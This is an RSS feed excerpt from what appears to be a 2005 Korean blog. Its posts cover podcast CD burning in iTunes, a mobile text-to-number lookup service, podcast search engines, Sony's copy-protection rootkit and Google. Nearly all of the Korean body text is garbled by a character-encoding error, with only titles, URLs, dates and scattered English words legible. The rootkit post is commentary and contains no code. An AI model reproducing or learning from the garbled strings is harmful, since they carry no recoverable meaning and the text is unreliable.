    -±׳·¸´¸י ¾ױְ¸·־ information-oriented, web as hypertext systemְ» ְ§ַ״¼± °ט¼׃ HTMLְּ »ח¿כµַ°ם task-oriented, web as software interface´ֲ ֱ¡ֲק XAML°ת °°ְ÷ ±ג¼ת·־ ´כִ¡µַ¾מ °¥ °ְֽ־°¡?  Software interface¸¦ ְ§ַׁ ַ¥ֱ״ָ­µַ¸י¼­ µ¿½ֳ¿¡ ָ¿ְ²ְְ־ ֳַ·§ְֶּ¶ף´ֲ °ְּֽ ¾ײֳ¿¡ °¡´ַֹׁ °ְֽ־°¡? X-Windowsµµ, Citrix Metaframeµµ, Network Computerµµ,  Sun Rayµµ, VNC³× Java Webstartµµ ֱַׁ₪ְְ¸·־ ¾²ְּ°ם ְײְ» »׃ְ־µ¥ °ת¿¬ world-wide ±װ¸נְַ remote software interface¸¦ ְ§ַ״ ¾ױְ¸·־ ¾מ¶² ±ג¼תְּ ְּ¿כµֹ °ְֽ־ֱצ ±ֳ±ַֿ´. - ]]> -
    - IT - Fri, 30 Dec 2005 13:25:40 GMT -
    - - <![CDATA[ iTunes¿¡¼­ Podcast CD-ROM ±ֱ±ג ]]> - http://yunho.egloos.com/2054395 - - -
    -ֳ³ְ½¿¡´ֲ podcast µנ·÷ֵה¸®¸¦ CD-ROMְ¸·־ ±׳´כ·־ ±¸¿´.  ´ַ״¼­ 700MB°¡ ¾ָµַ±גµµ ֱַצ¸¸, podcast ¼ׂ½÷÷°·־ ÷°µµ µנ·÷ֵה¸®·־ ±¸¿ל¸י ³×ֱ¿¡ ֳ£¾ֶµט±ג ½¬ְ» °ְּֽ¶ף°ם »‎°¢ַ±ג ¶§¹®ְּ´.  ±׳·±µ¥ ַׁµ¿¾ָ ְּ·± ¹ז½ְִ¸·־ ±¸¿צ¼­ ְּ¿כַֿ´÷¸´ֿ, ְּ¹ּ µיְ÷ podcast¿ֽ ¾ֱֶק µטֱצ ¾ְ÷ °ְֽ» ÷׀°£ַ״¼­ ֳ£¾ֶ µט´ֲ °ְּֽ ±ֲֽת¾ׂ´. ±׳³ֹ ַֿ³×ְַ µנ·÷ֵה¸®¿¡ podcast ¼ׂ½÷ ±¸÷׀ֱַֿצ ¾°ם ½ֳ°£¼רְ¸·־ ֲ ³×¿­µַ´ֲ °ְּֽ ´ץ ³×ְ» °ֽ °°¾ׂ´.  ֱ¶± µי¾מ÷¸´°¡ ְח¹ּ¾רְ¸¸י ±׳³ֹ skipַֿ¸י µַ°ם, ֱצ³­ ֱײ¿¡ ±¸ְ÷ CD-ROMְַ ³»¿כְּ ְּ¹ר ֱײ¿¡ ±¸ְ÷ °ֽ°ת ְֿ÷־ ֱ÷¹µַ´ץ¶ףµµ ֳ³ְ½ ¸מ podcast¸¦ skipַֿ¸י µַ´ֿ±מ.
    -
    -ְּ·¸°װ MP3 CD-ROMְ» ±ֱ±ג ְ§ַ״ ֳ³ְ½¿¡´ֲ ¸ְֶַ automator·־ ½ֳµµ¸¦ ְַ¸³× ְ µֱַצ ¾¾ׂ´. ¿×½ֳ visual programmingְ÷ ְֿ´ ½ְֳַֿ±ג´ֲ ½±ֱצ¸¸ ¼¼¼¼ַׁ ֱ¦¾מ¸¦ ַֿ±ג¿£ ´ץ ¾מ·ֶ´.  ֱ» ַֿ´°¡ ´כֳז ֶק±גַֿ°ם Python ½÷ֵ©¸³ֶ®·־ ¸¸µי¾ת´. 700MB ַׁµµ ³»¿¡¼­ °¡ְו ֳײ±¿¡ ´¿מ·־µוµָ podcast¸¦ ֳ£¾ֶ ½ֳ°£¼רְ¸·־ ¼ֳֶַׁׂ ִָ ְִֶֿ ְּ¸§ ¾ױ¿¡ 00, 01, 02 µמ°ת °°ְּ ¼‎ְ¸¦ ÷ְּ´ֲ °ְֽ÷ ½¬¿´ֲµ¥, MP3 ְְִֶֿ» ÷¹»ח/renameֱַֿצ ¾°ם symbolic link¸¦ ¸¸µי¾ת´ץ´ֿ ְּ°ֹ ֲׁ¾ֶ°¡¼­ CD-ROM¿¡ ±ֱ±ג´ֲ ַֿ´ֲµ¥ ±¸¿צֱר ְִֶֿ ְּ¸§µµ symbolic linkְַ ְּ¸§ְּ ¾ֶ´ֿ¶ף ¿ר·¡ ְִֶֿ ְּ¸§ְ¸·־ ±¸¿צֱ®¹צ·ָ´.  °ב±¹ link¸¦ ¸¸µו´ֲ ´כ½ֵ copyַֿµµ·ֿ ַ״¼­ ¼÷°רְ÷ ֱַצ¸¸, 700MB ֱ₪µµ¸¦ ¾µµ¥¾רְּ ÷¹»חַֿ´ֲ °ֽ °°¾ֶ¼­ ֲעֲעַ´.  "ֱרֲ¥ ¿£ֱצ´ֿ¾מ"´ֲ ½ַ¿כֱײְְְֱַּצ ¾´^^. ¾ֶ¹«¸® ½ַ¿כְְ¸·־ ְ µ¿ְַֿ´ץ¶ףµµ ÷סָ¿ְ²ְְ־ °ֽ °°ְ¸¸י ֱֲצ¸¦ ¸רַׁ´.
    -
    -±׳·¯´°¡ iTunesְַ ½÷¸¶ֶ® ֳַ·¹ְּ ¸®½÷ֶ®ְַ "ֳײ± ֳ°¡µָ ַ׳¸ס"ְ» ÷¸¸י¼­, ±׳³ֹ ְּ°ֹ ¾²¸י µַ´ֲ °ֽ ¾ֶ´ׁ°¡ ַֿ´ֲ »‎°¢ְּ µי¾ת´.  ¿×½ֳ  700MB ַׁµµְַ ֳײ± podcast¸¦ ÷¸¿©ֱײ´ֲ ¸®½÷ֶ®´ֲ ¾ֶ·¡¿ֽ °°ְּ ½±°װ ¸¸µי¾תֱ³°ם
    -
    -
    ְּ ¸®½÷ֶ®ְַ ָ­¸י¿¡ ÷¸¿©ֱצ´ֲ ¼ר¼­¸¦ ´¿מ·־µו¹ְ÷ ½ֳ°£ ¼רְ¸·־ ַֿ´ֲ °ֽµµ ½¬¿´ֲµ¥, °ת¿¬ CD-ROMְ¸·־ ±¸¿צֱת ¶§ ְּ ¼ר¼­°¡ ְ¯ֱצµַ´ֲ °ְֽֿ±מ?   ְ¥ְ» °ֻ»צַ״÷¸´ֿ µֹ °ֽ °°¾ֶ¼­ ¸מ¹י¿ר ³¯¸®´ֲ ¼ְִ¡°ם CD ְַׁוְ» ±¸¿צ÷ֳ´ץ´ֿ °ת¿¬!
    -
    -
    ְ§¿ֽ °°ְּ ְִֶֿ ְּ¸§ ¾ױ¿¡ ֱ¦´כ·־ ¼‎ְ¸¦ ÷¿©ֱײ´ֲ °ְּֽ¾ת´.  ¿×½ֳ... »ח¶קµיְּ iTunes¸¦ ±¦ָק ¸¹ְּ ¾²´ֲ °ְּֽ ¾ֶ´ֿ¾ת°ם Appleְּ ְְּ¯¾רְּ ָ¸»‎ַׁ °ְּֽ ¾ֶ´ֿ¾ת´.
    -
    -¿ְ´ְֳַ ±³ֶָ: Do not reinvent the iWheel!
    - - ]]> -
    - ¸ֶ - Sun, 25 Dec 2005 05:36:07 GMT -
    - - <![CDATA[ ¿צµו´ְּ¾ף ¼­÷ס½÷ ]]> - http://yunho.egloos.com/2026076 - - -
    -¿צµו ´ְּ¾ף ¼­÷ס½÷°¡ µוµנ¾מ ¿ְֲַµַ¾ת´.  ¹ּ±¹ µמֱצְַ ±₪°ם¸¦ ÷¸¸י, ְָ­¹רָ£¸¦ ¹®ְ·־ ַ¥ַצַֿ´ֲ °ז¿ל¸¦ ָחָק ÷¼ ¼צ ְײ´.  ¿¹¸¦ µי¸י, ְָ­ ¹׳ ְ־ֵֽ³ְ¸·־ PC¸¦ ֶַ¸ֵַֿ´ֲ Dell»חְַ ´כַ¥¹רָ£´ֲ 1-800-WWW-DELL ְּ´.  ¹°·׀ ְְֶַַ ַ״´ח ¹®ְ°¡ ַ¥½ֳµַ¾מְײ´ֲ ¹רָ£¸¦ ´©¸£´ֲ °ְּֽ¹ַ·־ ½ֱַ¦ ¼‎ְ·־ µָ ¹רָ£´ֲ 1-800-999-3355 ְֱּצ¸¸,  "WWW-DELL"ְּ "999-3355"÷¸´ ָ־¾ְ ±ג¾ןַֿ±ג ½±´.  ¹®ֱ¦´ֲ ְּ·¸°װ ְ´חַׁ ´¾מ·־ ³×ֵ¸³»¾מֱת ¼צ ְײ´ֲ ¹רָ£¸¦ ָ®÷¸ַֿ±ג°¡ ¾מ·ֶ°ם ֶ¯ָק ¿ל¸®³×¶ףְַ °ז¿ל ַׁ± ְּ¸§ְ÷ ±זְּ°¡ ±ז°ם ֱ¦ֱ¶»ח¿¡ µ¶ף ְְֶַַ ְ¸נ ַׂ´חְּ ´¶ף¼­ µ¿ְַֿׁ ¹ז¹‎ְ¸·־ ¼‎ְ ¹רָ£¸¦ ַ¥ַצַׂ ¼צ ¾ר´´ֲ ֱ¡.
    -
    -¿צµו´ְּ¾ףְ÷ ָ´כֶש¿¡ ¹®ְ¸¦ ְװ·ֲַֿ¸י ¹®ְ¿­ְ» ַ״½ּ(hashing)ַׁ ִָ ְֱֿ₪ַׁ ְ¸´¼צְַ 10ֱר¼צ·־ ÷¯ָ¯ַֿ°ם ֶ¯ֱ₪ prefix¿¡ ְּ °×ְ» ÷¿© ¸¸µי¾מֱר ¹רָ£·־ ְָ­¸¦ °ֹ°ם, ±³ָ¯±ג¿¡¼­ ְּ ¹רָ£¸¦ µמ·ֿµָ ½ֱַ¦ ¹רָ£·־ µ¹·ֱֱײ´ֲ ¹ז½ְִּ´ (½ֱַ¦·־´ֲ ֱ¶± ´ץ ÷¹ְגַװ).  ֳז÷׀ָק ±ה ¹רָ£¸¦ »ח¿כַֿ±ג ¶§¹®¿¡ hashing collisionְּ ְֿ¾מ³¯ °¡´ֹ¼÷ְ÷ °ְֵַ ¾ר°ם, ¼צ¹י¸¸°³ְַ »ףָ£³× ְּ¸§ְ» ¾ף¸¶µחֱצ ¼צ¿כַׂ ¼צ ְײְ¸¸ח µ¥ְֵּֽ ³׳ֶ®¿ק ֱ¢¼׃°תֱ₪ ¾רְּ ¹·־ ְ½¼÷ ֵכָ­°¡ ְּ·ח¾מֱר´´ֲ ֱ¡ְּ ְ¯»חַׁ ´¸¥ ¼­÷ס½÷ ´כ÷ס ְוֱ¡ְּ´.  ¹°·׀ ְּ¸¦ ְ§ַׁ ֱַ·־±׳·¥ְּ ָ´כֶש¿¡ ¼³ִ¡µַ¾מ¾ ֱַֿצ¸¸ ¾ױְ¸·־ ½ֵ±װֶשְַ °ז¿ל ¸´÷¿¡ ±ג÷» ³»ְוµֹ °טָ¹.
    -
    -»ח½ַ 100MHz°¡ ³ׁ¾מ°¡´ֲ 32 bit CPU¿¡ ¼צ½MBְַ ¸¸נ¸®¸¦ °¡ֱר ָ´כֶש¿¡¼­ µנֱצֵ׀ ³׳ֶ®¿קְ» ֵכַ״ ְָ­¸¦ ַֿ´ֲµ¥µµ ְָ­°ֹ ´כ»ףְ» ¼‎ְ·־¸¸ ¸ם½ֳַׂ ¼צ ְײ´´ֲ °ְֽ÷ ¸נµח ְ¥ »חְֶּ® ֱײ¼ׂ¸¦ IP ֱײ¼ׂ·־ ֱקֱ¢ ְװ·ֲַ״¾ ַֿ´ֲ °ֽ¸¸ֵ­ְּ³× ÷סַױ¸®ְְ׃¿¡µµ ÷ׂ±¸ַֿ°ם, ¼צ½³גְ ְ¯¼± ¾ײ³־·־±׳ ְָ­ְַ ֳ¼°ט¸¦ ±׳´כ·־ µנֱצֵ׀ ָ´כֶש¿¡ °¡ֱ®¿ֲ ¶§¹®ְּ´.
    -
    -SKT ָ´כֶש¸¸ »ח¿כ °¡´ַֹׁ ֱ¡, ָ´כֶש ´כ±גָ­¸י¿¡¼­ ¹·־ ¼‎ְ ´כ½ֵ ְװ·ְֲּ ¾ָµַ´ֲ ֱ¡ µמְַ °ֹ¸²µ¹ְּ ְײ¾מ ¾ף¸¶³× ¼÷°רְְֱֿצ´ֲ ¾ױְ¸·־ µ־°ם ÷ֱ¾°ֱצ¸¸, »ח¿כְµי¿¡°װ ¾ֶ¹«·± ÷־´ד¾רְּ ֶםְַ¸¦ ֱ¦°רַֿ¸י¼­ ¾ְֶּµנ¾מ¿ֽ ±ג¼ת·־½ב »ץ·־¿מ BMְ» ¸¸µי¾מ ³»¾ת´´ֲ ֱ¡¿¡¼­ ¸ֵ¿ל ¹¶קֱקַֿ°ם ±ג´כ°¡ µַ´ֲ ¼­÷ס½÷ְּ´.
    -
    - ]]> -
    - IT - Thu, 15 Dec 2005 06:40:02 GMT -
    - - <![CDATA[ Podcastµµ °ֻ»צְּ µָ´ ]]> - http://yunho.egloos.com/1981573 - - Podcast Chaos Be Gone"ְּ¶ף´ֲ ¿ְּֽ¾מµוְַ ±ג»ח¸¦ ÷¸¸י, Podcastְַ ³»¿כְ» ¹ּ¸® ְ½¼÷ ְ־½ְִ¸·־ ֵ״½÷ֶ®·־ ¹²ד ְ־µ¦½÷ַ״µ־¾ת´°¡ °ֻ»צַׂ ¼צ ְײµµ·ֿ ַ״ֱײ´ֲ ¼­÷ס½÷°¡ µמְוַ´.  ±ג»ח¿¡ ¾נ±µָ »חְֶּ® ֱ Podzinger´ֲ ±ג»ח ¶§¹®¿¡ ֶ®·¡ְַָּ ¸פ·ֱ¼­ְ־ֱצ ֱצ± ֱ¢¼׃µֱַצ ¾¾ֱׂצ¸¸, blinkx´ֲ ¸מ¸מ ´¾מ·־ °ֻ»צַ״÷¸´ֿ °ת¿¬ ְּ ´¾מ¸¦ ¾נ±ַֿ´ֲ podcast¸¦ ֳ£ְ» ¼צ ְײ¾ת´.
    -
    -Podcast¸¦ °ֻ»צַׂ ¼צ ְײ°װ µַ¾ת´´ֲ °ְֽ÷ ¸ֵ¿ל ֱ¿הַׁ °ְֽ¸·־¼­, podcastְַ ְ¯¿כ¼÷ְ» ַג»ף½ֳִׁ ´ץ ¸¹ְ÷ podcast°¡ »‎»ךµַ°ם ¶ַ °ֻ»צµַ¾מ ְּ¿כµַµµ·ֿ ַֿ´ֲ positive feedback ָ¿°ת¸¦ °¡ֱ®¿ֳ »׃¸¸ ¾ֶ´ֿ¶ף, °°ְ÷ ±ג¼תְּ podcast ¿¿¡µµ TV³× ¶ףµנ¿ְ ֱַ·־±׳·¥ µמ ¸נµח ְ½¼÷ °ֻ»צ¿¡ ְְ¿כµֹ ¼צ ְײ±ג ¶§¹®ְּ´.  ¹°·׀ ְּ°װ °¡´ַֹ״ֱר °ְֽ÷ ±׳µ¿¾ָ ¹ְַׁ ְ½¼÷ְ־½ִ ±ג¼ת ´צ÷׀ְ¸·־¼­ ַצְח ¿ל¸®³×¶ף  ְ½¼÷ְ־½ִ ±ג¼ת ¾ק°טְַ »ףָ²ְ» ÷¸¸י ְּ¿ֽ °°ְ÷ ±ג¼תְּ ¿ל¸®¸»¿¡ ´כַ״¼±  ַׁµ¿¾ָ °¡´ֱַֹֿצ ¾ְ» °ֽ °°´. ַֿ±ה ±ג»ח ³»¿כְ» ÷¸¸י  Podzinger¿¡¼­ »ח¿כַֿ´ֲ ±ג¼תְ÷ ¿ר·¡ ¹ּ±¹ ֱ₪÷¸±ג°ְּ  ¾ֶ¶ר¿¡¼­ °¨½ֳ¿כְ¸·־ »ח¿כַֿ±ג ְ§ַ״ °³¹µָ °ְּֽ¶ף°ם ַֿ´ֿ, °°ְ÷ ¸סְְ¸·־ ¹ּ±¹ְּ ÷ַֿׁ ¶§¹®¿¡ ¿ל¸®¸»¿¡ ´כַׁ ְ־½ִ ±ג¼תְ» °³¹ַׂ ֱצµµ ¸נ¸£´ֲ ְְּֿ´.  ±׳·¸°װ °³¹µָ ְ½¼÷ְ־½ִ ¿£ֱרְ÷ ÷ַֿׁ »חֵץ¸®¸¦ ´ץ ְ ְ־½ִַֿ°ֱצ¸¸.
    -
    -¹ּ±¹ ¿µָ­¸¦ ÷¸¸י ֱײְ־°רµיְּ ³לְ½±ג¿¡ ְ½¼÷ ¸¸נ¸¦ ַֿ´ֲ °ְֽ» ְֱײ ÷¼ ¼צ ְײ´. ¹°·׀ ְּ°ַ ֱײְ־°רְַ »‎°¢ְ» °°´¿¡°װ ְ´ַֿ±ג ְ§ַ״¼­ְּ°ם ½ֱַ¦·־´ֲ ±׳·¸°װ ָחַׁ ְְֿ÷ ¾ֶ´ֿ¶ף°ם ֱַֿצ¸¸, ¾ֶ¹¸ֶ° ±׳·± ¿כµµְַ ³לְ½±ג°¡ ²ֿ ֶָ¸®°ם ְײ°ם, ¿ל¸®³×¶ף¿¡¼± °ְֵַ ְּ¿כµֱַצ ¾´ֲ ְµ¿ ְְ´ה±ג³× ְ½¼÷ »ח¼­ַװְּ ³־¸® ְּ¿כµַ´ֲ °ְֽ» ÷¸¸י, ¹ּ±¹ »ח¶קµיְ÷ ³לְ½±ג¿¡´ ְ½¼÷ְ» ³²±ג´ֲ °ֽ¿¡ ְֽ¼קַׁ °ֽ °°´. ±׳·¸´¸י ³²µי¿¡°װ µי·ֱֱײ±ג ְ§ַׁ podcast »׃¸¸ ¾ֶ´ֿ¶ף ±׳³ֹ ְ½ְֵַ ¸¸נ ¿כµµ·־ ³לְ½ְ» ³²±ג°ם, ³×ֱ¿¡ ְּ¸¦ ֵ״½÷ֶ®·־ (ָ₪ְ÷ ְ½¼÷ְ¸·־) °ֻ»צַׂ ¼צµµ ְײֱצ ¾ְ»±מ?  ´ץ ³×¾ֶ°¡¼­, ¸¶ְֵּ©·־¼ֱֶַׂ®°¡ MyLifeBits ֱַ·־ֱ§ֶ®¿¡¼­ ½ֳµµַֿ´ֲ °ֳֽ³·³ ַ׳»ף ָ´כַֿ°ם ´´ֿ´ֲ ֶקֵֽ÷ם ְוִ¡°¡ ³× »׃¸¸ ¾ֶ´ֿ¶ף ³×¿ֽ ¾ך±גַֿ´ֲ »ף´כ¹זְַ ¸»±מֱצ - ¶ַ´ֲ ְָ­ ´כָ­±מֱצ - ¸נµ־ ³לְ½ַֿ°ם ְּ¸¦ ֵ״½÷ֶ®·־ ÷¯ָ¯ַֿ°ם ְ־µ¦½ַּֿ¿© °ֻ»צַׂ ¼צ ְײ´¸י ¼צֳ¸ְּ³× ¸¸נְוְּ ַ¿ה¾ר¾מֱת °ְּֽ´.   ¹°·׀  ְּ·± ְְּֿ ½ַַצµַ¸י ְּ ¶§¹®¿¡ ±ג¾ן·ְֲּ ³×÷ֱר´°ם ֵץ´ת´כ´ֲ »ח¶קµיµµ ְײ°ֱצ¸¸.
    - - ]]> -
    - IT - Wed, 30 Nov 2005 15:12:12 GMT -
    - - <![CDATA[ ¼ׂ´ְַֿ ·חֶ®ֵ¶ ]]> - http://yunho.egloos.com/1970143 - - ·חֶ®ֵ¶ »ח°ְַַ ¿©ִֶ°¡ ¿±¹¿¡¼± °ְָגְ» ¼צ ¾רְּ ִ¿ֱצ°ם ְײ´.  ·חֶ®ֵ¶(root kit)ְּ¶ץ OS¿¡ ¼³ִ¡µַ¾מ root ±ְַַׁ» °®°ם ְ½ְֵַ ֱ¸ְח±מֱצ °¨ֳח¹צ¸®´ֲ ¾ַ¼÷ִµו¸¦ ¸»ַֿ´ֲµ¥, ¼ׂ´ֿ°¡ ְ»חְַ ְ½¾ַ CD¿¡ ÷ׂ¹‎ ÷¹ֱ¦¸¦ ¸·±גְ§ַׁ ·חֶ®ֵ¶ְ» ½ֹ¾מµ־¾ת´ר °ְּֽ´.  »ח¿כְ¿¡°װ ¸םָ®ָק µו·¯³×ֱצ ¾´ֲ ְֲֵַַ ·חֶ®ֵ¶ְ» »ח¿כְ PC¿¡ ¼³ִ¡ַֿ´ֲ °ֽ¸¸ְ¸·־µµ ַױ¹‎ְְּ¶ף°ן ֱַֿצ¸¸ ±׳°ַ DMCA¿ֽ °°ְ÷ ¹«¸®ַׁ ¹‎·ְ» ¸¸µו´ֲ »ח¶קµי °ֱ¡¿¡¼­³× ±׳·¸°ם »ח¿כְ ְװְו¿¡¼± ¹«ֳ´ ±ג÷׀ ³×» ְְֿ־µ¥, ְּ¹ר ¼ׂ´ְַֿ ·חֶ®ֵ¶ְ÷ ְִֶֿ ְּ¸§¿¡ $SYS$ ¶ף´ֲ ¹®ְ¿­ְּ µי¾מ°¡´ֲ ¸נµח ְְִֶֿ» ¼°¹צ¸²ְ¸·־½ב ´¸¥ ¾ַ¼÷ִµו¿¡°װ±מֱצ »ץ·־¿מ ÷¸¾ָ °בַװְ» ֱ¦°רַֿ´ֲ ¼ְְּ µַ¾מ, ְּ¿¡ µ¸£´ֲ ְבְחְ ַַַ״¸¦ ÷¸»ף¹±ג ְ§ַׁ ¼ׂ¼µµ ְױµ¸£°ם ְײ´°ם ַׁ´. ¼ׂ´ֿ·־¼­´ֲ ¹°·׀ ְּ ·חֶ®ֵ¶ְּ ֶקַװµָ ¸נµח CD¿¡ ´כַׁ ָ¯÷ׂ°ת ±³ָ¯ְ» ½ַ½ֳַֿ°ם ְײֱצ¸¸, ¼ׂ´ְַֿ ַַַ״´ֲ ¸®ִ°ת ¼ׂ¼ »׃¸¸ ¾ֶ´ֿ¶ף ±ג¾ק ְּ¹ֱּצ ֳר¸י¿¡¼­µµ ¸·´כַׂ °ְֽ¸·־ »‎°¢µָ´.
    -
    -±׳·±µ¥ ְּ¹ר »חֲֵ·־ ¸»¹ּ¾ֿ¾ֶ ַַַ״¸¦ ÷¸´ֲ °ְֽ÷ ְֿ÷־ »ח¿כְ¿ֽ ¼ׂ´ֿ »׃¸¸ְּ ¾ֶ´ֿ´.  ְּ¹ּ ֵה·׀ »חְֶּ®¿¡´ֲ "´ץ ְּ»ף ֱ₪ַ° CD´ֲ ְ§ַטַ״¼­ ¸ר»ח°´.  ְֱּ¦ P2P »חְֶּ®¿¡¼­ ¾ְַָׁ MP3 ְִֶֿ¸¸ ´¿מ·־µו¹¾ֶ µט°´"´ֲ ְַ°ְּ ¿ֳ¶ף¿ֳ ֱ₪µµְ־µ¥ ´¼רַׁ ³ף´דְּ¶ף°ֵ³× µ· ¾ָ³»±ג ְ§ַׁ ±¸½ְַּ¶ף°ם ַֿ±ג¿£, ±ג¼תְְ¸·־ 100% ¿ְַ÷ ¾ך±ג¶ף¼­ ¹¹¶ף ¹·׀ְ» ֶל±ג°¡ ¾מ·ֶ´.  °ב±¹ ְ½¾ַ¾ק°ט ְֳ¼°¡ ַַַ״¸¦ ÷¸°װµָ ְּ¹ר ְְֿ» °ט±ג·־ ֱִֵֶ® ±ַ¸®ְµיµµ ְ½ֵµיְַ ±ַ¸®¸¦ ÷¸ָ£ַֿ±ג ְ§ַ״ ְ½ֵµיְַ °ם°´ְ» ְְ¸·־ ¸¸µו´ֲ ±״´ְְ־ ¹ז¹‎ְ» »ח¿כֱַֿצ ¸»°ם ֱ» ´ץ ֳ¢ְְְַּ°ם ְ±״ְְ־ ´כ¾ְָ» ³»³ץ¾ְׂ¸¸י ַׁ´.
    -
    -ֶַׁם ְּ¹ר ¼ׂ´ֿ CD¿¡ ֶקַװµָ ·חֶ®ֵ¶ְ÷ ¼ׂ´ֿ¿¡¼­ ֱקֱ¢ ֱ¦ְַׁ °ְֽ÷ ¾ֶ´ֿ°ם ¿µ±¹ְַ ַׁ ¼ֱֶַׂ®¿‏¾מ ָ¸»ח¿¡¼­ ¸¸µח °ְֽ¸·־ ¾ֻ·ֱֱ³´ֲµ¥, ¹°·׀ ±׳ ¼ֱֶַׂ®¿‏¾מְַ ±ג¼תְ ֶ¯ֲ¡°ת ְבְחְ ְ§ַט¼÷ְ» ְ¼¼ָק ¾ֻ¾ׂ´ץ¶ף¸י ¼ׂ´ְַֿ °ז¿µֱרְּ ְּ¸¦ ְ»ח CD¿¡ ±׳´כ·־ ֵ¾ְחֱַֿר ¾¾ְׂ» °ְּֽ´.  ֱַֿצ¸¸ ¼‎ְ¸¸ ¾ֻ°ם ְ±ג³׳ »ףַ°ְ» ֱ¦´כ·־ ְַּ״ַֿ·ֱֱַֿצ ¾´ֲ ´¸¥ ¸¹ְ÷ °ז¿µֱר°ת ¸¶ֲש°¡ֱצ·־ ¼ׂ´ְַֿ °ז¿µֱרµµ ±׳³ֹ "÷ׂ¹‎ ÷¹ֱ¦¸¦ ¸·´ֲ ָ¿°ת°¡ ֱֱ°ם", "ְֳ¼ °³¹÷ס÷¸´ ÷ס¿כְּ ְ°װ µח´"´ֲ °ֽ¸¸ְ¸·־ ֳ₪ְֳֵ» °בֱ₪ְַ» °ְּֽ°ם, ְּ¿¡ ´כַׁ ´ס°¡¸¦ ֵוֵוָק ִ¡¸£°װ µַ¾ת´ֲµ¥ ¾ױְ¸·־ °ז¿µְµיְּ ±ג¾ק ְ±¸®¿ֽ ְ»ח ֱ¦ַ°ְַ ³»¿כ¿¡ ´כַ״ ֱ» ´ץ °½ְֹ» °®°װ µַ´ֲ °ט±ג°¡ µַ±ז ±ג´כַׁ´. - ]]> -
    - IT - Sun, 27 Nov 2005 06:31:22 GMT -
    - - <![CDATA[ ±¸± == Skynet? ]]> - http://yunho.egloos.com/1951222 - - ¿מ¼¿כ ֱִֵ׳ְּ³¿¡´ ¼צֳµ´כְַ ¼­¹צ¸¦ ÷ס¹׀¸®¿¡ ֶ׀ֵ·ַ״³ײ°ם, ±׳µ¿¾ָ ַז°×¿¡ ֱ¶¿כָק »ח¸נְ÷ ¹י÷»¸ֱ¿¡´ ֱִֵ׳ְּ³¸¦ ¿¬°בַֿ¿© »ח½ַ»ף ַֿ·ם¹ד»ץ¿¡ ְ־ֵֽ³ְ» ְו¾ַַׁ´?  »ח½ְֱַֿצ´ֲ µ־°ם÷ֱ¾ ַֿ°ֱצ¸¸, ±¸±ְּ¶ף¸י ֳז÷׀ָק ַׂ¹‎ַׁ, ±¸±¸¸ְּ ַׂ ¼צ ְײ´ֲ ½ֳ³×¸®¿ְ°¡ ¾ֶ´ׂ ¼צ ¾ר´.  »ח½ַ ÷סµנ¿ְ ¼­÷ס½÷ְּ°ַ ¿ֲ¶ףְ־ ¿ְַַ½÷ְּ°ַ ְּ·± ְ־ֱַ¶ף¸¦ °®ֱֳצ ¾ְ¸¸י ¹®ֱ¦°¡ ¸¹ְ» °ְּֽ°ם ְ§ְַ ±¿¡¼­ ¾ך±גַׁ ¹ז¹‎ְּ °¡ְו °זֱ¦ְְ¸·־ ±¸±ְַ »ח¾קְ» °­ָ­ַׂ ¼צ ְײ´ֲ ¹ז¹‎ְּ±גµµ ַֿ´.  ְֱּ¦¾ ±¸±ְ» ¾מ¼³ֱַ°װ ָה³»³»±ג ½ְֳַׁ MS°¡ °ת¿¬ ¼÷°רְְ¸·־ ´כַ׳ַׂ ¼צ ְײְ»±מ?  ´µי Web 2.0ְּ´ֿ Software as a Service´ֿ ¸»µיְ÷ ¸¹¾ֱׂצ¸¸¼¼°טְ ±װ¸נ·־ ½÷ְִֹֿ·¯÷םַׁ ¼­÷ס½÷¸¦ °זְן·ְֲײ°װ ֱ¦°רַֿ´ֲµ¥ ְײ¾מ ±¸±ְ» ´חַ״³¾ ָ¸»ח°¡ ¾רְ» °ֽ °°´.
    - - ]]> -
    - IT - Mon, 21 Nov 2005 03:59:25 GMT -
    - - <![CDATA[ »ץ PC¸¦ ±¸ְװַֿ´. ]]> - http://yunho.egloos.com/1949431 - - -
    -¾ֱֶק ¼¼ְֳֶּ ´ ³¡³×ֱר ¾¾ֱׂצ¸¸, ¿×½ֳ µא¾ף ִ¾מ¶ף¼­ ÷סµנ¿ְ ְ־ִµשְ» ¹י±׳¶ף¿מµו·־ µ¹·ֱ³ץ°ם ִטְַֿ°װ ´¸¥ ְְֿ» ַׂ ¼צ ְײ¾ת´.  AutoGK·־  Battlestar Galactica Season 1ְ» A2 ֳײְ ֶק¸ְֻ¸·־ ְ־ִµשַ´. °¡·־ 400 ַָ¼¿, XviD 1 pass 90% quality, MP3 128K VBR¿¡ ְ¸· ֶקַװַ״¼­ ְ־ִµשַֿ´ֲµ¥ ¼ׂ¿הµַ´ֲ ½ֳ°£ְ÷ ¿¡ַַ¼ׂµו´ח ¾א 30÷׀.  XviD encoder°¡ ¸ײֶ¼¾²·¹µו°¡ ¾ֶ´ׁ °ְֽ¸·־ ¾ֻ°ם ְײְ¸³× ±׳·¡µµ µ־ ִ¾מ¸¦ ±׳·±´כ·־ ָ°¿כַֿ´ֲ µם ַ´.  ַׁ°¡ֱצ ¹®ֱ¦´ֲ ִֶ¿צ¼­ֳַ¶ףְּ°¡ ³¹« ¼ְׂ½ְּ ֵ©´´ֲ ֱ¡.  ֶַ¸ֳֵ³ְַ ֱ¦ַ° ¼³¸ם¸¸ ÷¸°ם ±¸ְװַ´ֲµ¥, µ´°װ »ח¿כְ ¸®÷ה µמְ» ְ׀¾מ÷¸´ֿ ´µי ¼ְׂ½ְּ ֵ« ¹®ֱ¦¸¦ ֱצְַֿ°ם ְײ´.  ¿×½ֳ ֱ» ´ץ ¸¶¿ל½÷ַ°ְ» ֶָ°ם ±¸ְװַ¾מ¾ ַ´ֲµ¥... ְ¯ֵכ»ח¿ֽ ֶַ¸ֳֵ³¿¡ ´כֳ¥ְ» ¹®ְַַ״³ץ¾ׂ´.
    -
